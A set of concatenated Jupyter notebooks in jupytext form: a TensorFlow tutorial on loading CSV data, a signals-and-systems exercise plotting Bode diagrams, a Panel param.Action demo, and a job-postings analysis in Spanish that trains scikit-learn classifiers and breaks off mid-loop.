traffic_volume_csv_gz_ds = tf.data.experimental.make_csv_dataset(
traffic_volume_csv_gz,
batch_size=256,
label_name='traffic_volume',
num_epochs=1,
compression_type="GZIP")
for batch, label in traffic_volume_csv_gz_ds.take(1):
for key, value in batch.items():
print(f"{key:20s}: {value[:5]}")
print()
print(f"{'label':20s}: {label[:5]}")
# + [markdown] id="p12Y6tGq8D6M"
# Note: If you need to parse those date-time strings in the `tf.data` pipeline you can use `tfa.text.parse_time`.
# + [markdown] id="EtrAXzYGP3l0"
# ### Caching
# + [markdown] id="fN2dL_LRP83r"
# There is some overhead to parsing the csv data. For small models this can be the bottleneck in training.
#
# Depending on your use case it may be a good idea to use `Dataset.cache` or `data.experimental.snapshot` so that the csv data is only parsed on the first epoch.
#
# The main difference between the `cache` and `snapshot` methods is that `cache` files can only be used by the TensorFlow process that created them, but `snapshot` files can be read by other processes.
#
# For example, iterating over the `traffic_volume_csv_gz_ds` 20 times, takes ~15 seconds without caching, or ~2s with caching.
# + id="Qk38Sw4MO4eh"
# %%time
for i, (batch, label) in enumerate(traffic_volume_csv_gz_ds.repeat(20)):
if i % 40 == 0:
print('.', end='')
print()
# + [markdown] id="pN3HtDONh5TX"
# Note: `Dataset.cache` stores the data from the first epoch and replays it in order. So using `.cache` disables any shuffles earlier in the pipeline. Below, the `.shuffle` is added back in after `.cache`.
# + id="r5Jj72MrPbnh"
# %%time
caching = traffic_volume_csv_gz_ds.cache()
for i, (batch, label) in enumerate(caching.shuffle(1000).repeat(20)):
if i % 40 == 0:
print('.', end='')
print()
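The contract `Dataset.cache` provides can be sketched with a minimal Python class (names hypothetical): the expensive producer runs once, and every later pass replays the stored elements in the same order, which is why any shuffle must come after the cache:

```python
class CachedIterable:
    """Sketch of Dataset.cache semantics: pay the parse cost once, then
    replay the stored elements, in order, on every subsequent pass."""
    def __init__(self, source_fn):
        self._source_fn = source_fn  # expensive producer, e.g. CSV parsing
        self._cache = None

    def __iter__(self):
        if self._cache is None:
            self._cache = list(self._source_fn())  # first epoch: parse and store
        return iter(self._cache)

calls = []
def expensive_parse():
    calls.append(1)  # count how often the "parser" actually runs
    return [1, 2, 3]

ds = CachedIterable(expensive_parse)
epoch1, epoch2 = list(ds), list(ds)
print(epoch1, epoch2, len(calls))  # parsed only once
```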
# + [markdown] id="wN7uUBjmgNZ9"
# Note: `snapshot` files are meant for *temporary* storage of a dataset while in use. This is *not* a format for long term storage. The file format is considered an internal detail, and not guaranteed between TensorFlow versions.
# + id="PHGD1E8ktUvW"
# %%time
snapshot = tf.data.experimental.snapshot('traffic.tfsnap')
snapshotting = traffic_volume_csv_gz_ds.apply(snapshot)
for i, (batch, label) in enumerate(snapshotting.shuffle(1000).repeat(20)):
if i % 40 == 0:
print('.', end='')
print()
# + [markdown] id="fUSSegnMCGRz"
# If your data loading is slowed by parsing CSV files, and `cache` and `snapshot` are insufficient for your use case, consider re-encoding your data into a more streamlined format.
# + [markdown] id="M0iGXv9pC5kr"
# ### Multiple files
# + [markdown] id="9FFzHQrCDH4w"
# All the examples so far in this section could easily be done without `tf.data`. One place where `tf.data` can really simplify things is when dealing with collections of files.
#
# For example, the [character font images](https://archive.ics.uci.edu/ml/datasets/Character+Font+Images) dataset is distributed as a collection of csv files, one per font.
#
# 
#
# Image by <a href="https://pixabay.com/users/wilhei-883152/?utm_source=link-attribution&utm_medium=referral&utm_campaign=image&utm_content=705667"><NAME></a> from <a href="https://pixabay.com/?utm_source=link-attribution&utm_medium=referral&utm_campaign=image&utm_content=705667">Pixabay</a>
#
# Download the dataset, and have a look at the files inside:
# + id="RmVknMdJh5ks"
fonts_zip = tf.keras.utils.get_file(
'fonts.zip', "https://archive.ics.uci.edu/ml/machine-learning-databases/00417/fonts.zip",
cache_dir='.', cache_subdir='fonts',
extract=True)
# + id="xsDlMCnyi55e"
import pathlib
font_csvs = sorted(str(p) for p in pathlib.Path('fonts').glob("*.csv"))
font_csvs[:10]
# + id="lRAEJx9ROAGl"
len(font_csvs)
# + [markdown] id="19Udrw9iG-FS"
# When dealing with a bunch of files you can pass a glob-style `file_pattern` to the `experimental.make_csv_dataset` function. The order of the files is shuffled each iteration.
#
# Use the `num_parallel_reads` argument to set how many files are read in parallel and interleaved together.
# + id="6TSUNdT6iG58"
fonts_ds = tf.data.experimental.make_csv_dataset(
file_pattern = "fonts/*.csv",
batch_size=10, num_epochs=1,
num_parallel_reads=20,
shuffle_buffer_size=10000)
# + [markdown] id="XMoexinLHYFa"
# These csv files have the images flattened out into a single row. The column names are formatted `r{row}c{column}`. Here's the first batch:
# + id="RmFvBWxxi3pq"
for features in fonts_ds.take(1):
for i, (name, value) in enumerate(features.items()):
if i>15:
break
print(f"{name:20s}: {value}")
print('...')
print(f"[total: {len(features)} features]")
# + [markdown] id="xrC3sKdeOhb5"
# #### Optional: Packing fields
#
# You probably don't want to work with each pixel in separate columns like this. Before trying to use this dataset be sure to pack the pixels into an image-tensor.
#
# Here is code that parses the column names to build images for each example:
# + id="hct5EMEWNyfH"
import re
def make_images(features):
image = [None]*400
new_feats = {}
for name, value in features.items():
    match = re.match(r'r(\d+)c(\d+)', name)
if match:
image[int(match.group(1))*20+int(match.group(2))] = value
else:
new_feats[name] = value
image = tf.stack(image, axis=0)
image = tf.reshape(image, [20, 20, -1])
new_feats['image'] = image
return new_feats
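The same parsing logic works on a miniature example. This standalone numpy sketch packs a hypothetical 2x2 "image" from `r{row}c{column}` keys and passes other features through untouched:

```python
import re
import numpy as np

def pack_pixels(features, rows=2, cols=2):
    # Collect r{row}c{col} columns into an image array; keep everything else.
    image = np.zeros((rows, cols))
    packed = {}
    for name, value in features.items():
        match = re.match(r'r(\d+)c(\d+)', name)
        if match:
            image[int(match.group(1)), int(match.group(2))] = value
        else:
            packed[name] = value
    packed['image'] = image
    return packed

out = pack_pixels({'r0c0': 1, 'r0c1': 2, 'r1c0': 3, 'r1c1': 4, 'm_label': 65})
print(out['image'])
```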
# + [markdown] id="61qy8utAwARP"
# Apply that function to each batch in the dataset:
# + id="DJnnfIW9baE4"
fonts_image_ds = fonts_ds.map(make_images)
for features in fonts_image_ds.take(1):
break
# + [markdown] id="_ThqrthGwHSm"
# Plot the resulting images:
# + id="I5dcey31T_tk"
from matplotlib import pyplot as plt
plt.figure(figsize=(6,6), dpi=120)
for n in range(9):
plt.subplot(3,3,n+1)
plt.imshow(features['image'][..., n])
plt.title(chr(features['m_label'][n]))
plt.axis('off')
# + [markdown] id="7-nNR0Nncdd1"
# ## Lower level functions
# + [markdown] id="3jiGZeUijJNd"
# So far this tutorial has focused on the highest-level utilities for reading csv data. There are two other APIs that may be helpful for advanced users, if your use case doesn't fit the basic patterns.
#
# * `tf.io.decode_csv` - a function for parsing lines of text into a list of CSV column tensors.
# * `tf.data.experimental.CsvDataset` - a lower level csv dataset constructor.
#
# This section recreates functionality provided by `make_csv_dataset`, to demonstrate how this lower level functionality can be used.
#
# + [markdown] id="LL_ixywomOHW"
# ### `tf.io.decode_csv`
#
# This function decodes a string, or list of strings into a list of columns.
#
# Unlike `make_csv_dataset` this function does not try to guess column data-types. You specify the column types by providing a list of `record_defaults` containing a value of the correct type, for each column.
#
# To read the Titanic data **as strings** using `decode_csv` you would say:
# + id="m1D2C-qdlqeW"
text = pathlib.Path(titanic_file_path).read_text()
lines = text.split('\n')[1:-1]
all_strings = [str()]*10
all_strings
# + id="9W4UeJYyHPx5"
features = tf.io.decode_csv(lines, record_defaults=all_strings)
for f in features:
print(f"type: {f.dtype.name}, shape: {f.shape}")
# + [markdown] id="j8TaHSQFoQL4"
# To parse them with their actual types, create a list of `record_defaults` of the corresponding types:
# + id="rzUjR59yoUe1"
print(lines[0])
# + id="7sPTunxwoeWU"
titanic_types = [int(), str(), float(), int(), int(), float(), str(), str(), str(), str()]
titanic_types
# + id="n3NlViCzoB7F"
features = tf.io.decode_csv(lines, record_defaults=titanic_types)
for f in features:
print(f"type: {f.dtype.name}, shape: {f.shape}")
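The role `record_defaults` plays can be imitated with the standard `csv` module: each default's type determines how the corresponding field is parsed, and empty fields fall back to the default value. A simplified single-line sketch (function name hypothetical, not TensorFlow's implementation):

```python
import csv
import io

def decode_csv_line(line, record_defaults):
    # Parse one CSV line; each default supplies both the target type
    # (via type(default)) and the fallback value for empty fields.
    fields = next(csv.reader(io.StringIO(line)))
    return [type(default)(field) if field != '' else default
            for field, default in zip(fields, record_defaults)]

print(decode_csv_line('1,female,38.0', [int(), str(), float()]))
```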
# + [markdown] id="m-LkTUTnpn2P"
# Note: it is more efficient to call `decode_csv` on large batches of lines than on individual lines of csv text.
# + [markdown] id="Yp1UItJmqGqw"
# ### `tf.data.experimental.CsvDataset`
#
# The `tf.data.experimental.CsvDataset` class provides a minimal CSV `Dataset` interface without the convenience features of the `make_csv_dataset` function: column header parsing, column type-inference, automatic shuffling, file interleaving.
#
# This constructor uses `record_defaults` the same way as `tf.io.decode_csv`:
#
# + id="9OzZLp3krP-t"
simple_titanic = tf.data.experimental.CsvDataset(titanic_file_path, record_defaults=titanic_types, header=True)
for example in simple_titanic.take(1):
print([e.numpy() for e in example])
# + [markdown] id="_HBmfI-Ks7dw"
# The above code is basically equivalent to:
# + id="E5O5d69Yq7gG"
def decode_titanic_line(line):
return tf.io.decode_csv(line, titanic_types)
manual_titanic = (
# Load the lines of text
tf.data.TextLineDataset(titanic_file_path)
# Skip the header row.
.skip(1)
# Decode the line.
.map(decode_titanic_line)
)
for example in manual_titanic.take(1):
print([e.numpy() for e in example])
# + [markdown] id="5R3ralsnt2AC"
# #### Multiple files
#
# To parse the fonts dataset using `experimental.CsvDataset`, you first need to determine the column types for the `record_defaults`. Start by inspecting the first row of one file:
# + id="3tlFOTjCvAI5"
font_line = pathlib.Path(font_csvs[0]).read_text().splitlines()[1]
print(font_line)
# + [markdown] id="etyGu8K_ySRz"
# Only the first two fields are strings, the rest are ints or floats, and you can get the total number of features by counting the commas:
# + id="crgZZn0BzkSB"
num_font_features = font_line.count(',')+1
font_column_types = [str(), str()] + [float()]*(num_font_features-2)
# + [markdown] id="YeK2Pw540RNj"
# The `CsvDataset` constructor can take a list of input files, but reads them sequentially. The first file in the list of CSVs is `AGENCY.csv`:
# + id="_SvL5Uvl0r0N"
font_csvs[0]
# + [markdown] id="EfAX3G8Xywy6"
# So when you pass the list of files to `CsvDataset` the records from `AGENCY.csv` are read first:
# + id="Gtr1E66VmBqj"
simple_font_ds = tf.data.experimental.CsvDataset(
font_csvs,
record_defaults=font_column_types,
header=True)
# + id="k750Mgq4yt_o"
for row in simple_font_ds.take(10):
print(row[0].numpy())
# + [markdown] id="NiqWKQV21FrE"
# To interleave multiple files, use `Dataset.interleave`.
#
# Here's an initial dataset that contains the csv file names:
# + id="t9dS3SNb23W8"
font_files = tf.data.Dataset.list_files("fonts/*.csv")
# + [markdown] id="TNiLHMXpzHy5"
# This shuffles the file names each epoch:
# + id="zNd-TYyNzIgg"
print('Epoch 1:')
for f in list(font_files)[:5]:
print(" ", f.numpy())
print(' ...')
print()
print('Epoch 2:')
for f in list(font_files)[:5]:
print(" ", f.numpy())
print(' ...')
# + [markdown] id="B0QB1PtU3WAN"
# The `interleave` method takes a `map_func` that creates a child-`Dataset` for each element of the parent-`Dataset`.
#
# Here, you want to create a `CsvDataset` from each element of the dataset of files:
# + id="QWp4rH0Q4uPh"
def make_font_csv_ds(path):
return tf.data.experimental.CsvDataset(
path,
record_defaults=font_column_types,
header=True)
# + [markdown] id="VxRGdLMB5nRF"
# The `Dataset` returned by `interleave` returns elements by cycling over a number of the child-`Dataset`s. Note, below, how the dataset cycles over three font files at a time (`cycle_length=3`):
# + id="OePMNF_x1_Cc"
font_rows = font_files.interleave(make_font_csv_ds,
cycle_length=3)
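The cycling behavior of `interleave` can be modeled in plain Python: keep up to `cycle_length` child iterators active, visit them round-robin, and pull in the next source when one runs out. A simplified sketch (ignoring parallelism and `block_length`):

```python
def interleave(sources, cycle_length):
    # Round-robin over up to cycle_length child iterators, refilling
    # from the remaining sources as children are exhausted.
    pending = [iter(s) for s in sources]
    active, pending = pending[:cycle_length], pending[cycle_length:]
    while active:
        for it in list(active):
            try:
                yield next(it)
            except StopIteration:
                active.remove(it)
                if pending:
                    active.append(pending.pop(0))

files = [['a1', 'a2'], ['b1', 'b2'], ['c1', 'c2'], ['d1']]
print(list(interleave(files, cycle_length=3)))
```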
# + id="UORIGWLy54-E"
fonts_dict = {'font_name':[], 'character':[]}
for row in font_rows.take(10):
fonts_dict['font_name'].append(row[0].numpy().decode())
fonts_dict['character'].append(chr(row[2].numpy()))
pd.DataFrame(fonts_dict)
# + [markdown] id="mkKZa_HX8zAm"
# #### Performance
#
# + [markdown] id="8BtGHraUApdJ"
# Earlier, it was noted that `io.decode_csv` is more efficient when run on a batch of strings.
#
# It is possible to take advantage of this fact, when using large batch sizes, to improve CSV loading performance (but try [caching](#caching) first).
# + [markdown] id="d35zWMH7MDL1"
# With the built-in loader, 20 batches of 2048 examples take about 17s.
# + id="ieUVAPryjpJS"
BATCH_SIZE=2048
fonts_ds = tf.data.experimental.make_csv_dataset(
file_pattern = "fonts/*.csv",
batch_size=BATCH_SIZE, num_epochs=1,
num_parallel_reads=100)
# + id="MUC2KW4LkQIz"
# %%time
for i,batch in enumerate(fonts_ds.take(20)):
print('.',end='')
print()
# + [markdown] id="5lhnh6rZEDS2"
# Passing **batches of text lines** to `decode_csv` runs faster, in about 5s:
# + id="4XbPZV1okVF9"
fonts_files = tf.data.Dataset.list_files("fonts/*.csv")
fonts_lines = fonts_files.interleave(
lambda fname:tf.data.TextLineDataset(fname).skip(1),
cycle_length=100).batch(BATCH_SIZE)
fonts_fast = fonts_lines.map(lambda x: tf.io.decode_csv(x, record_defaults=font_column_types))
# + id="te9C2km-qO8W"
# %%time
for i,batch in enumerate(fonts_fast.take(20)):
print('.',end='')
print()
# + [markdown] id="aebC1plsMeOi"
# For another example of increasing csv performance by using large batches see the [overfit and underfit tutorial](../keras/overfit_and_underfit.ipynb).
#
# This sort of approach may work, but consider other options like `cache` and `snapshot`, or re-encoding your data into a more streamlined format.
site/en-snapshot/tutorials/load_data/csv.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: mydsp
# language: python
# name: mydsp
# ---
# [<NAME>](https://orcid.org/0000-0001-7225-9992),
# Professorship Signal Theory and Digital Signal Processing,
# [Institute of Communications Engineering (INT)](https://www.int.uni-rostock.de/),
# Faculty of Computer Science and Electrical Engineering (IEF),
# [University of Rostock, Germany](https://www.uni-rostock.de/en/)
#
# # Tutorial Signals and Systems (Signal- und Systemtheorie)
#
# Summer Semester 2021 (Bachelor Course #24015)
#
# - lecture: https://github.com/spatialaudio/signals-and-systems-lecture
# - tutorial: https://github.com/spatialaudio/signals-and-systems-exercises
#
# WIP...
# The project is currently under heavy development, as new material is added for the summer semester 2021.
#
# Feel free to contact lecturer [<EMAIL>](https://orcid.org/0000-0002-3010-0294)
#
# ## Übung / Exercise 6
# +
import numpy as np
import matplotlib.pyplot as plt
import scipy.signal as signal
base = 10 # log frequency axis, either 10 for log10 or 2 for log2
w = np.logspace(-3, 3, num=2**10, base=10)
figw, figh = 8, 8*10/16
# +
# Max-Phase System
sz = 2
sp = -1/2
H0 = 2
sys = signal.lti(sz, sp, H0)
w, Hlevel_dB, Hphase_deg = sys.bode(w)
w, H = sys.freqresp(w)
Hman1 = ((8*w**2 - 8) + 1j*20*w) / (1+4*w**2)
Hman2 = 10*np.log10(((8*w**2 - 8)**2 + 400*w**2)/(1+4*w**2)**2)
Hman3 = np.arctan2(20, 8*w-8/w)
print(np.allclose(Hlevel_dB, 20*np.log10(np.abs(H))))
print(np.allclose(Hlevel_dB, 20*np.log10(np.abs(Hman1))))
print(np.allclose(Hlevel_dB, Hman2))
print(np.allclose(Hphase_deg, np.angle(H)*180/np.pi))
print(np.allclose(Hphase_deg, np.angle(Hman1)*180/np.pi))
print(np.allclose(Hphase_deg, Hman3*180/np.pi))
plt.figure(figsize=(figw, figh))
plt.subplot(2, 1, 1)
plt.semilogx(w, Hlevel_dB, 'C0', lw=3, base=base)
#plt.xlabel(r'$\omega$ / (rad/s)')
plt.ylabel(r'level in dB')
plt.title(r'Maximum Phase System $H(s)_\mathrm{max}=2\,\frac{s-2}{s+1/2}$')
plt.xlim(w[0], w[-1])
plt.grid(True, which='both')
plt.subplot(2, 1, 2)
plt.semilogx(w, Hphase_deg, 'C0', lw=3, base=base)
plt.xlabel(r'$\omega$ / (rad/s)')
plt.ylabel(r'phase in degree')
plt.grid(True, which='both')
plt.xlim(w[0], w[-1])
plt.yticks(np.arange(0, 180+30, 30))
plt.grid(True, which='both')
plt.savefig('MaxMinPhaseAllpass_numpy_E1E7E53CFF_maxphase.pdf')
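The closed-form `Hman1` checked above follows from substituting s = jω into H(s) = 2(s−2)/(s+1/2) and multiplying numerator and denominator by the conjugate of the denominator. A standalone numpy cross-check of that algebra:

```python
import numpy as np

w = np.logspace(-3, 3, num=64)
# Direct evaluation of H(s) = 2(s - 2)/(s + 1/2) at s = jw ...
H_direct = 2 * (1j * w - 2) / (1j * w + 0.5)
# ... equals the rationalized form used for Hman1 above:
# ((8 w^2 - 8) + 20 j w) / (1 + 4 w^2)
H_manual = ((8 * w**2 - 8) + 1j * 20 * w) / (1 + 4 * w**2)
print(np.allclose(H_direct, H_manual))
```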
# +
# Min-Phase System
sz = -2
sp = -1/2
H0 = 2
sys = signal.lti(sz, sp, H0)
w, Hlevel_dB, Hphase_deg = sys.bode(w)
w, H = sys.freqresp(w)
Hman1 = ((8*w**2 + 8) - 1j*12*w) / (1+4*w**2)
Hman2 = 10*np.log10(((8*w**2 + 8)**2 + 144*w**2)/(1+4*w**2)**2)
Hman3 = np.arctan2(-12, 8*w+8/w)
print(np.allclose(Hlevel_dB, 20*np.log10(np.abs(H))))
print(np.allclose(Hlevel_dB, 20*np.log10(np.abs(Hman1))))
print(np.allclose(Hlevel_dB, Hman2))
print(np.allclose(Hphase_deg, np.angle(H)*180/np.pi))
print(np.allclose(Hphase_deg, np.angle(Hman1)*180/np.pi))
print(np.allclose(Hphase_deg, Hman3*180/np.pi))
plt.figure(figsize=(figw, figh))
plt.subplot(2, 1, 1)
plt.semilogx(w, Hlevel_dB, 'C1', lw=3, base=base)
#plt.xlabel(r'$\omega$ / (rad/s)')
plt.ylabel(r'level in dB')
plt.title(r'Minimum Phase System $H(s)_\mathrm{min}=2\,\frac{s+2}{s+1/2}$')
plt.xlim(w[0], w[-1])
plt.grid(True, which='both')
plt.subplot(2, 1, 2)
plt.semilogx(w, Hphase_deg, 'C1', lw=3, base=base)
plt.xlabel(r'$\omega$ / (rad/s)')
plt.ylabel(r'phase in degree')
plt.grid(True, which='both')
plt.xlim(w[0], w[-1])
plt.yticks(np.arange(-45, 0+15, 15))
plt.grid(True, which='both')
plt.savefig('MaxMinPhaseAllpass_numpy_E1E7E53CFF_minphase.pdf')
# +
# Allpass System
sz = +2
sp = -2
H0 = 1
sys = signal.lti(sz, sp, H0)
w, Hlevel_dB, Hphase_deg = sys.bode(w)
w, H = sys.freqresp(w)
Hman1 = ((w**2-4) + 1j*4*w) / (w**2+4)
Hman2 = 10*np.log10(((w**2-4)**2+16*w**2)/(w**2+4)**2)
Hman3 = np.arctan2(4, w-4/w)
print(np.allclose(Hlevel_dB, 20*np.log10(np.abs(H))))
print(np.allclose(Hlevel_dB, 20*np.log10(np.abs(Hman1))))
print(np.allclose(Hlevel_dB, Hman2))
print(np.allclose(Hphase_deg, np.angle(H)*180/np.pi))
print(np.allclose(Hphase_deg, np.angle(Hman1)*180/np.pi))
print(np.allclose(Hphase_deg, Hman3*180/np.pi))
plt.figure(figsize=(figw, figh))
plt.subplot(2, 1, 1)
plt.semilogx(w, Hlevel_dB, 'C2', lw=3, base=base)
#plt.xlabel(r'$\omega$ / (rad/s)')
plt.ylabel(r'level in dB')
plt.title(r'Allpass System $H(s)_\mathrm{all}=\frac{s-2}{s+2}$')
plt.xlim(w[0], w[-1])
plt.ylim(-12, 12)
plt.grid(True, which='both')
plt.subplot(2, 1, 2)
plt.semilogx(w, Hphase_deg, 'C2', lw=3, base=base)
plt.xlabel(r'$\omega$ / (rad/s)')
plt.ylabel(r'phase in degree')
plt.grid(True, which='both')
plt.xlim(w[0], w[-1])
plt.yticks(np.arange(0, 180+30, 30))
plt.grid(True, which='both')
plt.savefig('MaxMinPhaseAllpass_numpy_E1E7E53CFF_allpass.pdf')
# -
# ## Copyright
#
# This tutorial is provided as Open Educational Resource (OER), to be found at
# https://github.com/spatialaudio/signals-and-systems-exercises
# accompanying the OER lecture
# https://github.com/spatialaudio/signals-and-systems-lecture.
# Both are licensed under a) the Creative Commons Attribution 4.0 International
# License for text and graphics and b) the MIT License for source code.
# Please attribute material from the tutorial as *<NAME>,
# Continuous- and Discrete-Time Signals and Systems - A Tutorial Featuring
# Computational Examples, University of Rostock* with
# ``main file, github URL, commit number and/or version tag, year``.
system_properties_ct/MaxMinPhaseAllpass_numpy_E1E7E53CFF.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# ---
# +
import param
import panel as pn
pn.extension(sizing_mode="stretch_width")
# -
# ## param.Action Example
#
# This example demonstrates how to use ``param.Action`` to trigger an update in a method that depends on that parameter. Actions can trigger any function, but if we simply want to trigger a method that depends on that action, then we can define a small ``lambda`` function that triggers the parameter explicitly.
# +
class ActionExample(param.Parameterized):
"""
Demonstrates how to use param.Action to trigger an update.
"""
action = param.Action(lambda x: x.param.trigger('action'), label='Click here!')
number = param.Integer(default=0)
@param.depends('action')
def get_number(self):
self.number += 1
return self.number
action_example = ActionExample()
component = pn.Column(
pn.Row(
pn.Column(pn.panel(action_example, show_name=False, margin=0, widgets={"action": {"button_type": "primary"}, "number": {"disabled": True}}),
'**Click the button** to trigger an update in the output.'),
pn.panel(action_example.get_number, width=300), max_width=600)
)
component
# -
# ## App
#
# Let's wrap it in a nice template that can be served via `panel serve action_button.ipynb`
pn.template.FastListTemplate(
site="Panel", title="param.Action Example",
main=[
"This example demonstrates **how to use ``param.Action`` to trigger an update** in a method that depends on that parameter.\n\nActions can trigger any function, but if we simply want to trigger a method that depends on that action, then we can define a small ``lambda`` function that triggers the parameter explicitly.",
component,
]
).servable();
examples/gallery/param/action_button.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 2
# language: python
# name: python2
# ---
# +
# %matplotlib inline
from datetime import datetime
import pyspark
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
plt.style.use('default')  # make the plots look a bit nicer
plt.rcParams['figure.figsize'] = (15, 5)
# -
try:
type(sc)
except NameError:
sc = pyspark.SparkContext('local[*]')
spark = pyspark.sql.SparkSession(sc)
sqlContext = pyspark.SQLContext(sc)
postulantes = pd.read_csv('./fiuba_1_postulantes_educacion.csv')
postulantes = pd.merge(postulantes, pd.read_csv('./fiuba_2_postulantes_genero_y_edad.csv'), on="idpostulante")
postulantes.head()
postulantes.nombre.unique()
postulantes.estado.unique()
postulantes.dropna(inplace=True)
postulantes.count()
# +
def fecha_a_anio(fecha):
anio = fecha.split('-')[0]
return int(anio) if anio.isdigit() else 0
def anio_a_edad(anio):
return 2018 - anio
# -
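The two helpers can be checked in isolation; note the notebook's fixed reference year of 2018 and the `0` fallback for unparseable dates:

```python
def fecha_a_anio(fecha):
    # Extract the birth year from a 'YYYY-MM-DD' string; 0 if unparseable.
    anio = fecha.split('-')[0]
    return int(anio) if anio.isdigit() else 0

def anio_a_edad(anio):
    # Age relative to the dataset's reference year, 2018.
    return 2018 - anio

print(anio_a_edad(fecha_a_anio('1990-05-01')))
```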
postulantes['edad'] = postulantes['fechanacimiento'].apply(fecha_a_anio).apply(anio_a_edad)
postulantes.drop(columns=['fechanacimiento'], inplace=True)
postulantes['edad'].head()
postulantes = postulantes[(postulantes['edad'] >= 18) & (postulantes['edad'] < 65)]
avisos = pd.read_csv('./fiuba_6_avisos_detalle.csv')
print(avisos.columns)
avisos = avisos[['idaviso', 'nombre_zona', 'tipo_de_trabajo', 'nivel_laboral', 'nombre_area']]
avisos.dropna(inplace=True)
avisos.head(5)
avisos.count()
vistas = pd.read_csv('./fiuba_3_vistas.csv')
vistas['count'] = 1
vistas['idaviso'] = vistas['idAviso']
vistas.drop(columns=['idAviso'], inplace=True)
vistas.head()
vistas_por_aviso = vistas.groupby('idaviso')['count'].sum().reset_index()[['idaviso', 'count']]
vistas_por_aviso.head()
postulaciones = pd.read_csv('./fiuba_4_postulaciones.csv')
postulaciones['count'] = 1
postulaciones.head()
postulaciones_por_aviso = postulaciones.groupby('idaviso')['count'].sum().reset_index()[['idaviso', 'count']]
postulaciones_por_aviso.head()
avisos = avisos.merge(postulaciones_por_aviso, on='idaviso')
avisos.rename(columns={'count':'posts_count'}, inplace=True)
avisos.head()
avisos = avisos.merge(vistas_por_aviso, on='idaviso')
avisos.rename(columns={'count':'vistas_count'}, inplace=True)
avisos.head()
avisos.dropna(inplace=True)
posts_por_area = avisos.groupby('nombre_area')['posts_count'].sum().reset_index()
areas_a_borrar = list(posts_por_area[(posts_por_area['posts_count'] < 500)]['nombre_area'].unique())
areas_a_borrar
avisos['ctr'] = avisos['posts_count']/avisos['vistas_count']
avisos['ctr'] = avisos['ctr'].apply(lambda x: 1 if x > 1 else x)
avisos.head()
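The click-through rate computed above is applications divided by views, clamped at 1 (a user can apply without a logged view, which would otherwise push the ratio above 1). As a standalone helper (name hypothetical):

```python
def ctr(postulaciones, vistas):
    # Applications per view, clamped to the [0, 1] range.
    return min(postulaciones / float(vistas), 1.0)

print(ctr(5, 10), ctr(12, 10))
```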
avisos.count()
postulaciones = postulaciones[['idaviso', 'idpostulante']]
avisos = avisos.merge(postulaciones, on="idaviso")
avisos.head()
avisos.count()
avisos = avisos.merge(postulantes, on='idpostulante')
avisos.head()
avisos.count()
avisos.drop(columns=['idpostulante'], inplace=True)
avisos.drop(columns=['ctr'], inplace=True)
avisos[['nombre_zona', 'tipo_de_trabajo', 'nivel_laboral', 'nombre', 'estado', 'sexo', 'nombre_area']] = avisos[['nombre_zona', 'tipo_de_trabajo', 'nivel_laboral', 'nombre', 'estado', 'sexo', 'nombre_area']].apply(lambda x: x.astype('category'))
avisos.drop(columns=['posts_count', 'vistas_count'], inplace=True)
avisos.head()
avisos.count()
avisos = avisos[~avisos['nombre_area'].isin(areas_a_borrar)]
avisos.count()
avisos.head()
avisos.dtypes
avisos2 = pd.read_csv('./fiuba_6_avisos_detalle.csv')
print(avisos2.columns)
avisos2 = avisos2[['idaviso', 'nombre_zona', 'tipo_de_trabajo', 'nivel_laboral', 'nombre_area']]
avisos2[['nombre_zona', 'tipo_de_trabajo', 'nivel_laboral', 'nombre_area']] = avisos2[['nombre_zona', 'tipo_de_trabajo', 'nivel_laboral', 'nombre_area']].apply(lambda x: x.astype('category'))
avisos2.dropna(inplace=True)
vistas.rename(columns={'idAviso':'idaviso'}, inplace=True)
vistas = vistas[['idaviso', 'idpostulante']]
post = pd.DataFrame(postulaciones['idaviso'].unique(), columns=['idaviso'])
avisos2 = avisos2.merge(post, on='idaviso', how='left')
avisos2 = avisos2.merge(vistas, on="idaviso")
avisos2 = avisos2.merge(postulantes, on='idpostulante')
avisos2[['nombre', 'estado', 'sexo']] = avisos2[['nombre', 'estado', 'sexo']].apply(lambda x: x.astype('category'))
avisos2 = avisos2[~avisos2['nombre_area'].isin(areas_a_borrar)]
avisos2.head()
avisos2.count()
avisos2.drop(columns=['idpostulante'], inplace=True)
avisos2.head()
avisos['se_postula'] = 1
avisos2['se_postula'] = 0
avisos.head()
avisos2.head()
aviso = None
avisos = pd.concat([avisos, avisos2], ignore_index=True)
avisos = pd.get_dummies(avisos)
avisos.head()
avisos.drop(columns=['idaviso'], inplace=True)
edad_min = avisos['edad'].min()
edad_max = avisos['edad'].max()
avisos['edad'] = avisos['edad'].apply(lambda x: (x-edad_min)/float(edad_max-edad_min))
avisos.head()
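The age transformation above is plain min-max scaling onto [0, 1]; a standalone sketch of the same formula:

```python
def min_max_scale(values):
    # Map values linearly onto [0, 1]: (x - min) / (max - min).
    lo, hi = min(values), max(values)
    return [(v - lo) / float(hi - lo) for v in values]

print(min_max_scale([18, 41.5, 65]))
```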
import gc
del [[postulantes, postulaciones, avisos2, vistas, post, postulaciones_por_aviso]]
postulantes = None
postulaciones = None
avisos2 = None
vistas = None
post = None
postulaciones_por_aviso = None
X = None
y = None
gc.collect()
from scipy.sparse import csr_matrix
y = avisos.se_postula.values
X = csr_matrix(avisos.drop('se_postula', axis=1).values)
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y)
print("X_train size: {} | y_train size: {} | X_test size: {} | y_test size: {}".format(X_train.shape, y_train.shape, X_test.shape, y_test.shape))
# +
from sklearn.metrics import accuracy_score
from sklearn.metrics import f1_score
from sklearn.dummy import DummyClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.neural_network import MLPClassifier
from sklearn.naive_bayes import MultinomialNB
from sklearn.linear_model import Perceptron
import time
classifiers = ({'Baseline' : DummyClassifier(strategy='uniform'),
'Decision Tree' : DecisionTreeClassifier(max_depth=10),
'Naive Bayes' : MultinomialNB(),
'Multi Layer Perceptron' : MLPClassifier(hidden_layer_sizes=30, activation='logistic'),
'Perceptron' : Perceptron(penalty='l2')
})
results = {}
for (clf_label, clf) in classifiers.items():
    t0 = time.time()
    clf.fit(X_train, y_train)
    t1 = time.time()
    predicted = clf.predict(X_test)
